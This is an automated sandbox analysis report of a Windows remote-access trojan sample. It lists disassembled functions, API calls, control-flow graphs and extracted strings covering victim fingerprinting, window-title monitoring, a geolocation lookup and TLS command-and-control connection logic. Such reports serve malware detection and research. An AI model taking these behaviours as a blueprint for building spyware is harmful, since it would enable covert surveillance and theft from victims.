                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID:
                                                          • API String ID: 1815803762-0
                                                          • Opcode ID: 35a60dd61fd8b237ab80bed8c3b3b6d5f5cecafcaafe6d2ae27acd69f3d7963f
                                                          • Instruction ID: 69441ad90531868046e0b1178e1924530c202fcb63ed7aa5228c64bcbe668f15
                                                          • Opcode Fuzzy Hash: 35a60dd61fd8b237ab80bed8c3b3b6d5f5cecafcaafe6d2ae27acd69f3d7963f
                                                          • Instruction Fuzzy Hash: ADE09231608350FFFB300F25AC08F177B94EB89B65F21063AF155E40E4CAA59805961C
                                                          Function 0041A9AD Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750FC), ref: 0041A9CA
                                                          • GetUserNameW.ADVAPI32(?,0040E096), ref: 0041A9E2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Name$ComputerUser
                                                          • String ID:
                                                          • API String ID: 4229901323-0
                                                          • Opcode ID: c38e36c8d41ee46761b6a4ad2d0e2b40601694a6c822a335d006f55048ef3fa5
                                                          • Instruction ID: dd4171341b6269d20eef4dfb17ad31a68228dcd82fcdc0eb213b330dd994abd5
                                                          • Opcode Fuzzy Hash: c38e36c8d41ee46761b6a4ad2d0e2b40601694a6c822a335d006f55048ef3fa5
                                                          • Instruction Fuzzy Hash: 16014F7290011CAADB00EB90DC49ADDBB7CEF44315F10016AB502B3195EFB4AB898A98
                                                          Function 0040E751 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004146BA,00474EE0,00475A38,00474EE0,00000000,00474EE0,?,00474EE0,6.0.0 Pro), ref: 0040E765
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 4f63efff100e8568bd7427ee403b69b99ebb5287ae6166f5ca37386f2dc94b8d
                                                          • Instruction ID: 426317967f55bc2b8d076a22fb2a8dcf1c85f3a8f112093483d3870effb55d88
                                                          • Opcode Fuzzy Hash: 4f63efff100e8568bd7427ee403b69b99ebb5287ae6166f5ca37386f2dc94b8d
                                                          • Instruction Fuzzy Hash: A6D05E607002197BEA109691CC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF048AE1
                                                          Function 00426302 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: e479f6d312995adc38c95d140b7cef8bd4a3583c6482d3884fe68aabfa392038
                                                          • Instruction ID: 85cd51724732601f8c8003b199973b8832ebbe95acea7078dd2fcbbf2f3153fb
                                                          • Opcode Fuzzy Hash: e479f6d312995adc38c95d140b7cef8bd4a3583c6482d3884fe68aabfa392038
                                                          • Instruction Fuzzy Hash: FCB09279118202FFCA051B60CC0887ABEB6ABCC381F108D2DB986A01B0DE37C451AB26
                                                          Function 004140AC Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 855sleepnetworkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 449 4140ac-4140f7 call 401faa call 41ac7e call 401faa call 401d64 call 401e8f call 43a7f7 462 414106-414154 call 401f66 call 401d64 call 401fbd call 41b1ce call 404262 call 401d64 call 40b125 449->462 463 4140f9-414100 Sleep 449->463 478 414156-4141c5 call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 462->478 479 4141c8-414262 call 401f66 call 401d64 call 401fbd call 41b1ce call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 462->479 463->462 478->479 532 414272-414279 479->532 533 414264-414270 479->533 534 41427e-41431a call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a891 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 414072 532->534 533->534 561 414367-414375 call 4041f1 534->561 562 41431c-414362 WSAGetLastError call 41be81 call 404c9e call 401f66 call 41a891 call 401eea 534->562 568 4143a2-4143b7 call 404915 call 40428c 561->568 569 414377-41439d call 401f66 * 2 call 41a891 561->569 584 414ce6-414cf8 call 4047eb call 4020b4 562->584 568->584 585 4143bd-41450a call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a891 call 401eea * 4 call 41ab78 call 41375b call 4082dc call 440e5e call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 412735 568->585 569->584 598 414d20-414d28 call 401d8c 584->598 599 414cfa-414d1a call 401d64 call 401e8f call 43a7f7 Sleep 584->599 649 41450c-414519 call 40541d 585->649 650 41451e-414545 call 401e8f call 4125eb 585->650 598->479 599->598 649->650 656 414547-414549 650->656 657 41454c-414975 call 403b40 call 41aff9 call 40cc9a call 41b0d3 call 40cbf1 call 41aff9 call 41b0d3 call 41af51 call 401d64 GetTickCount call 41af51 call 41aeab call 41af51 * 2 call 41ae5d call 41b0d3 * 5 call 40e751 call 41b0d3 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 4027cb call 40275c call 4027cb call 40275c 650->657 656->657 797 414977 call 404468 657->797 798 41497c-414c4d call 401eea * 54 call 401e13 call 401eea * 7 call 401e13 call 401eea call 401e13 call 4045d5 797->798 930 414c52-414c59 798->930 931 414c5b-414c62 930->931 932 414c6d-414c74 930->932 931->932 933 414c64-414c66 931->933 934 414c80-414cb2 call 405415 call 401f66 * 2 call 41a891 932->934 935 414c76-414c7b call 40a767 932->935 933->932 946 414cb4-414cc0 CreateThread 934->946 947 414cc6-414ce1 call 401eea * 2 call 401e13 934->947 935->934 946->947 947->584
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,00000029,00475308,?,00000000), ref: 00414100
                                                          • WSAGetLastError.WS2_32 ref: 00414321
                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00414D1A
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$ErrorLastLocalTime
                                                          • String ID: | $%I64u$6.0.0 Pro$C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$PhNG$Rmc-JLQBNY$TLS Off$TLS On $TeF$dMG$hSG$hlight$name$NG$NG$UG$VG
                                                          • API String ID: 524882891-3805499607
                                                          • Opcode ID: 918bc987664b8491f60aceb4f06e3f4d68d9346336c78d86623a22e9571963aa
                                                          • Instruction ID: c3263a97f07b8ae9d11225c8127e62ab27a72c03ae3a8f764161ebb565a1ac44
                                                          • Opcode Fuzzy Hash: 918bc987664b8491f60aceb4f06e3f4d68d9346336c78d86623a22e9571963aa
                                                          • Instruction Fuzzy Hash: EE625E71A001145ACB18F771DDA6AEE73659FA0308F1041BFB80A771E2EF785E85CA9D
                                                          Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040A456
                                                          • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                          • GetForegroundWindow.USER32 ref: 0040A467
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                          • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                          • String ID: [${ User has been idle for $ minutes }$<mG$<mG$<mG$]
                                                          • API String ID: 911427763-3636820255
                                                          • Opcode ID: 0c0e445e6939d6f7940a0c5a45d91b61cd855127d753689433e6956e50b99563
                                                          • Instruction ID: ab9145b4e211f5f3da3af6290e6e7a2c9d96cae7f6b46a2c86e206227f6ebbf0
                                                          • Opcode Fuzzy Hash: 0c0e445e6939d6f7940a0c5a45d91b61cd855127d753689433e6956e50b99563
                                                          • Instruction Fuzzy Hash: 1951D0716043409BC324FB25D886AAE7795AF84718F00093FF446A32E2DF7C9E55868F
                                                          Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1034 40428c-4042ad connect 1035 4043e1-4043e5 1034->1035 1036 4042b3-4042b6 1034->1036 1039 4043e7-4043f5 WSAGetLastError 1035->1039 1040 40445f 1035->1040 1037 4043da-4043dc 1036->1037 1038 4042bc-4042bf 1036->1038 1041 404461-404465 1037->1041 1042 4042c1-4042e8 call 404cbf call 401f66 call 41a891 1038->1042 1043 4042eb-4042f5 call 42035c 1038->1043 1039->1040 1044 4043f7-4043fa 1039->1044 1040->1041 1042->1043 1056 404306-404313 call 42057e 1043->1056 1057 4042f7-404301 1043->1057 1046 404439-40443e 1044->1046 1047 4043fc-404437 call 41be81 call 404c9e call 401f66 call 41a891 call 401eea 1044->1047 1049 404443-40445c call 401f66 * 2 call 41a891 1046->1049 1047->1040 1049->1040 1066 404315-404338 call 401f66 * 2 call 41a891 1056->1066 1067 40434c-404357 call 42113f 1056->1067 1057->1049 1096 40433b-404347 call 42039c 1066->1096 1080 404389-404396 call 4204f5 1067->1080 1081 404359-404387 call 401f66 * 2 call 41a891 call 42079d 1067->1081 1093 404398-4043bb call 401f66 * 2 call 41a891 1080->1093 1094 4043be-4043d7 CreateEventW * 2 1080->1094 1081->1096 1093->1094 1094->1037 1096->1040
                                                          APIs
                                                          • connect.WS2_32(?,?,?), ref: 004042A5
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                          • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                          • API String ID: 994465650-2151626615
                                                          • Opcode ID: cf49c6f555c49f8e19da3bd343099bda81994a7576a786df9d473324a29203c1
                                                          • Instruction ID: 8d860672b69a19ae3c360ccb47b0a38bc4e99592ce22fc56bfe6acc5d0e7da0a
                                                          • Opcode Fuzzy Hash: cf49c6f555c49f8e19da3bd343099bda81994a7576a786df9d473324a29203c1
                                                          • Instruction Fuzzy Hash: D54109B0B0020277CA04B77A884766E7A55AB85314B80012FE901A7AD3FE3DAD2587DF
                                                          Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1109 40c89e-40c8c3 call 401e52 1112 40c8c9 1109->1112 1113 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1109->1113 1114 40c8d0-40c8d5 1112->1114 1115 40c9c2-40c9c7 1112->1115 1116 40c905-40c90a 1112->1116 1117 40c9d8 1112->1117 1118 40c9c9-40c9ce call 43ae1f 1112->1118 1119 40c8da-40c8e8 call 41a956 call 401e18 1112->1119 1120 40c8fb-40c900 1112->1120 1121 40c9bb-40c9c0 1112->1121 1122 40c90f-40c916 call 41b366 1112->1122 1137 40ca18-40ca85 call 403b40 call 40cd0a call 402860 * 2 call 401e13 * 5 1113->1137 1125 40c9dd-40c9e2 call 43ae1f 1114->1125 1115->1125 1116->1125 1117->1125 1129 40c9d3-40c9d6 1118->1129 1141 40c8ed 1119->1141 1120->1125 1121->1125 1138 40c918-40c968 call 403b40 call 43ae1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1122->1138 1139 40c96a-40c9b6 call 403b40 call 43ae1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1122->1139 1134 40c9e3-40c9e8 call 4082d7 1125->1134 1129->1117 1129->1134 1134->1113 1147 40c8f1-40c8f6 call 401e13 1138->1147 1139->1141 1141->1147 1147->1113
                                                          APIs
                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                          • API String ID: 82841172-425784914
                                                          • Opcode ID: 4c2cb8f42a11c4837a933b64665c4adbebb485c1a13128294ca0300166a406df
                                                          • Instruction ID: f058a63a2e06dcb2b247864a9289bab0e783a4957c20bc3838a58b63f1508e50
                                                          • Opcode Fuzzy Hash: 4c2cb8f42a11c4837a933b64665c4adbebb485c1a13128294ca0300166a406df
                                                          • Instruction Fuzzy Hash: F0415C721482009AC214F721DC97DAFB7A4AE90759F10063FF546720E2EE7CAA59C69F
                                                          Function 00409E48 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNEL32(00001388), ref: 00409E62
                                                            • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                            • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                            • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                            • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                          • String ID: PSG$PSG
                                                          • API String ID: 3795512280-3836871860
                                                          • Opcode ID: 59d6eda1dc5a04f955d13a7f06d1206386346812c1dd96bd75aa56d1c89d0c36
                                                          • Instruction ID: 2e46ee78bd67d64478951c63fc585b7447d0c94e1b250d5b4a4871e09aa14890
                                                          • Opcode Fuzzy Hash: 59d6eda1dc5a04f955d13a7f06d1206386346812c1dd96bd75aa56d1c89d0c36
                                                          • Instruction Fuzzy Hash: 68517F716043005ACB05BB71C866ABF779AAF81309F00453FF886B71E2DE7D9D45C69A
                                                          Function 0041A66E Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0041B366: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B377
                                                            • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
                                                            • Part of subcall function 004125EB: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0041260F
                                                            • Part of subcall function 004125EB: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0041262C
                                                            • Part of subcall function 004125EB: RegCloseKey.KERNEL32(?), ref: 00412637
                                                          • StrToIntA.SHLWAPI(00000000,0046CC58,?,00000000,00000000,004750FC,00000003,Exe,00000000,0000000E,00000000,0046656C,00000003,00000000), ref: 0041A6E4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                          • String ID: (32 bit)$ (64 bit)$8ZG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                          • API String ID: 782494840-1475859423
                                                          • Opcode ID: f7a85f495538476fd04f4c990f04aa920c7271ab473fda262265197c8bc14782
                                                          • Instruction ID: 1adcdd06a104af508aeef54d465e0c78d2d81651f2e3fe11076ab4bcd17b792f
                                                          • Opcode Fuzzy Hash: f7a85f495538476fd04f4c990f04aa920c7271ab473fda262265197c8bc14782
                                                          • Instruction Fuzzy Hash: 1811C660A001012AC704B3A6DCDBDBF765A9B91304F44413FB856A71E2FB6C9D9583EE
                                                          Function 0041A726 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1330 41a726-41a765 call 401faa call 43aa9c InternetOpenW InternetOpenUrlW 1335 41a767-41a788 InternetReadFile 1330->1335 1336 41a78a-41a7aa call 401f86 call 402f08 call 401eea 1335->1336 1337 41a7ae-41a7b1 1335->1337 1336->1337 1339 41a7b3-41a7b5 1337->1339 1340 41a7b7-41a7c4 InternetCloseHandle * 2 call 43aa97 1337->1340 1339->1335 1339->1340 1344 41a7c9-41a7d3 1340->1344
                                                          APIs
                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A749
                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A75F
                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A778
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A7BE
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A7C1
                                                          Strings
                                                          • http://geoplugin.net/json.gp, xrefs: 0041A759
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                          • String ID: http://geoplugin.net/json.gp
                                                          • API String ID: 3121278467-91888290
                                                          • Opcode ID: d708bf57c9bcdd1f8a7a65ae69f1350cab0609a96e180bb87bda40cc4cda5db0
                                                          • Instruction ID: dd066ffe0ad47051801ff1a9504fa95a24023bf504f9cdcf24902ddc36d2e50e
                                                          • Opcode Fuzzy Hash: d708bf57c9bcdd1f8a7a65ae69f1350cab0609a96e180bb87bda40cc4cda5db0
                                                          • Instruction Fuzzy Hash: C311947110A3126BD624EB169C85DBF7BECEF86765F00043EF845A2191DF68D848C6BA
                                                          Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1395 409d97-409da7 1396 409e44-409e47 1395->1396 1397 409dad-409daf 1395->1397 1398 409db2-409dd8 call 401e07 CreateFileW 1397->1398 1401 409e18 1398->1401 1402 409dda-409de8 GetFileSize 1398->1402 1403 409e1b-409e1f 1401->1403 1404 409dea 1402->1404 1405 409e0f-409e16 CloseHandle 1402->1405 1403->1398 1406 409e21-409e24 1403->1406 1407 409df4-409dfb 1404->1407 1408 409dec-409df2 1404->1408 1405->1403 1406->1396 1409 409e26-409e2d 1406->1409 1410 409e04-409e09 Sleep 1407->1410 1411 409dfd-409dff call 40a7f0 1407->1411 1408->1405 1408->1407 1409->1396 1412 409e2f-409e3f call 4082dc call 4098a5 1409->1412 1410->1405 1411->1410 1412->1396
                                                          APIs
